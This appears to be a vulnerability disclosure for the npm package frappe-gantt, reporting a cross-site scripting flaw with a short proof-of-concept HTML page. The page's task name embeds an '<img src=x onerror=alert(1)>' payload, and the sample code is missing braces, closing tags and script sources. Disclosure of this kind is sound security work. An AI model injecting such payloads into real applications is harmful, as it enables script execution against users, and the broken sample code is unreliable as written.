vulnerability cross-site scripting (xss)
severity 5.4
language javascript
registry npm


frappe-gantt is vulnerable to Cross-Site Scripting (XSS).

Steps To Reproduce

Copy the below content and save it into a .html file and open in any browser XSS payload will get executed.

<!DOCTYPE html>
<html lang="en">
    <link rel="stylesheet" href="" />
    <script src=""></script>
    <div class="container">
        <h2>Interactive Gantt Chart entirely made in SVG!</h2>
        <div class="gantt-target"></div>
        var tasks = [
                start: '2018-10-01',
                end: '2018-10-08',
                name: 'Redesign website"<img src=x onerror=alert(1)>',
                id: "Task 0",
                progress: 20
                start: '2018-10-03',
                end: '2018-10-06',
                name: 'Write new content',
                id: "Task 1",
                progress: 5,
                dependencies: 'Task 0'
        var gantt_chart = new Gantt(".gantt-target", tasks, {
            on_click: function (task) {
            on_date_change: function(task, start, end) {
                console.log(task, start, end);
            on_progress_change: function(task, progress) {
                console.log(task, progress);
            on_view_change: function(mode) {
            view_mode: 'Month',
            language: 'en'